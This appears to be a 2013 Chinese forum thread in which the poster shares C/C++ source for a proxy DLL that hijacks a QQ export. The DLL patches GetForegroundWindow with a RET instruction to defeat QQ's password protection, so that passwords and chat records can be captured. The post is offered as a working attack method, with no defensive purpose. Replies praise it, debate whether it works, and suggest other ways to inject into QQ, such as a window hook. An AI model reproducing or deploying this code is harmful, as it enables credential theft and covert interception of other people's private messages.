首页
社区
课程
招聘
[原创]另类方法,停止qq的密码保护,截取聊天记录等
发表于: 2013-5-20 15:00 44638

[原创]另类方法,停止qq的密码保护,截取聊天记录等

2013-5-20 15:00
44638
 
void DisableGetForegroundWindow()
{
    HMODULE hUser32;
    LPBYTE pfn;
    DWORD dwOldProtect;
    hUser32 = LoadLibraryW(L"user32.dll");
    pfn = (LPBYTE)GetProcAddress(hUser32,"GetForegroundWindow");
    VirtualProtect(pfn,16,PAGE_EXECUTE_READWRITE,&dwOldProtect);
    pfn[0] = 0xC3; //retn
}
 
DWORD __stdcall workerThread(LPVOID lparam)
{
    DisableGetForegroundWindow();
 
    return 0;
}
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
 
        Hook::Hook();
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        Free();
        Hook::Unhook();
 
    }
 
    return TRUE;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 
 
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
ALCDECL AheadLib_RunQQHummerEngine(void)
{
    // 保存返回地址
    __asm POP m_dwReturn[0 * TYPE long];
 
    CreateThread(NULL,0,workerThread,0,0,NULL);
 
    // 调用原始函数
    GetAddress("RunQQHummerEngine")();
 
    // 转跳到返回地址
    __asm JMP m_dwReturn[0 * TYPE long];
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 5
支持
分享
最新回复 (81)
雪    币: 778
活跃值: (208)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
2
mark,火了卖位置!!!
2013-5-20 15:07
0
雪    币: 188
活跃值: (32)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
3
好东西啊! 我先在虚拟机验证一下
2013-5-20 15:09
0
雪    币: 188
活跃值: (32)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
4
又是一种思路!持续关注中
2013-5-20 15:10
0
雪    币: 34
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
5
好东东啊。
2013-5-20 15:11
0
雪    币: 19
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
厉害呀,下来看看
2013-5-20 15:11
0
雪    币: 1088
活跃值: (30)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
7
NB了.难道腾讯坑爹了不去验证DLL?
2013-5-20 15:18
0
雪    币: 778
活跃值: (208)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
8
我劫持dbghelp.dll也可以
2013-5-20 15:27
0
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
这不是DLL劫持,鉴定完毕!
2013-5-20 15:53
0
雪    币: 6723
活跃值: (1199)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
前排占位
2013-5-20 16:04
0
雪    币: 85
活跃值: (87)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
测试了几个2013版都没用, 替换dll之后, QQ根本起不来;
2013-5-20 16:41
0
雪    币: 12
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
火钳留名,楼主牛人,膜拜
2013-5-20 17:00
0
雪    币: 87
活跃值: (205)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
是不是部分版本才起作用???
2013-5-20 17:03
0
雪    币: 270
活跃值: (97)
能力值: ( LV8,RANK:140 )
在线值:
发帖
回帖
粉丝
14
赞同,不过依然支持楼主的钻研和奉献精神
2013-5-20 17:15
0
雪    币: 27
活跃值: (127)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
15
我来看热闹..
2013-5-20 17:15
0
雪    币: 27
活跃值: (127)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
16
GetForegroundWindow一直就是QQ密码保护的痛脚,09年我也在研究这个,感慨。。
2013-5-20 17:27
0
雪    币: 496
活跃值: (286)
能力值: ( LV13,RANK:400 )
在线值:
发帖
回帖
粉丝
17
技术太老了。。不便评论。
2013-5-20 18:45
0
雪    币: 100
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
都痛脚了,那就割掉
2013-5-20 19:19
0
雪    币: 100
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
注册了快8年才发2帖
2013-5-20 19:21
0
雪    币: 186
活跃值: (136)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
必须Mark一下,很实用
2013-5-20 19:24
0
雪    币: 14
活跃值: (88)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
HummerEngine被替了,真没有事?还是某些功能没有了?
2013-5-20 20:57
0
雪    币: 371
活跃值: (72)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
22
围观~~~~~~
2013-5-20 21:04
0
雪    币: 109
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
厉害 学习了
2013-5-20 21:24
0
雪    币: 238
活跃值: (216)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
好思路,谢谢楼主分享
2013-5-20 23:17
0
雪    币: 387
活跃值: (66)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
想要注入到QQ完全没这么麻烦吧。一个WH_CALLWNDPROC就搞定了。QQ2013测试通过。
2013-5-20 23:31
0
游客
登录 | 注册 方可回帖
返回
//